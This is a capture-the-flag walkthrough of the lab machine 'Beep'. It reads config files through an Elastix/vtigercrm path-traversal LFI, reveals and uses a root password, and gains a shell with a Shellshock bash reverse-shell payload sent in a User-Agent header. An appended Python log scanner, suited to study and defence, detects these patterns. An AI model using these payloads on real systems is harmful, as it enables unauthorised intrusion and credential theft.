Beep

Easy Linux machine

nmap:

As usual, let's start by scanning for open services with nmap:

nmap -sC -sV -oA beep 10.10.10.7

Content discovery using gobuster:

gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 200 --no-error

If we browse to /admin it prompts for the admin password; if you don't have a password, it shows this page.

I couldn't go any further, so I checked for Elastix exploits using searchsploit.

The one that seems to work is the LFI vulnerability.

Let's run searchsploit -x <PATH> to examine the exploit.

Method 1 => LFI to RCE

Now let's visit the Exploit-DB URL to take a look at the exploit.

Let's visit this path:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Reviewing the source of this page reveals the admin password.

We can use this password to log in to the Elastix login form.

Now let's disclose /etc/passwd:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

Now SSH to the Beep box as root, using the password we found in amportal.conf:

root : jEhdIekWmdjE

ssh root@10.10.10.7

Method 2 => RCE through Shellshock

From the nmap scan we know port 10000 is open and running Webmin httpd, so let's visit it:

When we submit wrong credentials, it reveals the session_login.cgi path.

CGI scripts that use the Bash shell to process user input were particularly susceptible to exploitation, because the web server hands request headers to the script as environment variables, and vulnerable Bash versions executed commands appended to a function definition found in such a variable. The well-known vulnerability that abused this to run arbitrary code through CGI scripts is called Shellshock.

So let's test whether this CGI script is vulnerable to Shellshock.

Let's capture the login submission with Burp Suite and replace the User-Agent value with a Shellshock payload carrying a Bash one-liner reverse shell:

() { :;}; bash -i >& /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1

Before sending this request we have to start a listener on the port specified in the payload; for me it was 443.

Now let's send the request using Burp.

And we get back a reverse shell.
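As an added defender-side example (not part of the original walkthrough): a small Python scanner that flags, in web-server access logs, the two request shapes used above, a percent-encoded ../ traversal with a %00 terminator in the query string, and the () { :;}; Bash function prefix in a header that a CGI script would hand to the shell. The log lines, addresses and timestamps are constructed, not captured from the target.

```python
import re
from urllib.parse import unquote

# Combined log format: ip ident user [ts] "METHOD path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Bash function-definition prefix in a header value: the Shellshock trigger shape.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{.*?\}\s*;")

# Constructed sample lines (addresses and timestamps are made up, not captured from the target).
SAMPLE_LOGS = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "POST /session_login.cgi HTTP/1.1" 200 120 "-" "() { :;}; bash -i >& /dev/tcp/203.0.113.7/443 0>&1"',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def decode_path(path):
    """Percent-decode until stable so double-encoded traversal (%252e%252e) is also seen."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def analyze_line(line):
    """Return the parsed fields plus a list of triggered rule names, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    decoded = decode_path(rec["path"])
    alerts = []
    if "../" in decoded or "..\\" in decoded:
        alerts.append("lfi_traversal")   # ../../etc/... style path climbing
    if "\x00" in decoded:
        alerts.append("null_byte")       # %00 used to cut off a suffix the script appends
    for field in ("ua", "referer"):
        if SHELLSHOCK_RE.search(rec[field]):
            alerts.append("shellshock")  # () { ... }; in a header the CGI handler exports
            break
    rec["alerts"] = alerts
    return rec

def scan_logs(lines):
    """Keep only the records that triggered at least one rule."""
    return [r for r in map(analyze_line, lines) if r and r["alerts"]]
```

Running scan_logs(SAMPLE_LOGS) returns the first two records with their alerts lists and drops the benign third request.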

Hope you found this walkthrough easy to understand and follow.

Greetings from Sayonara
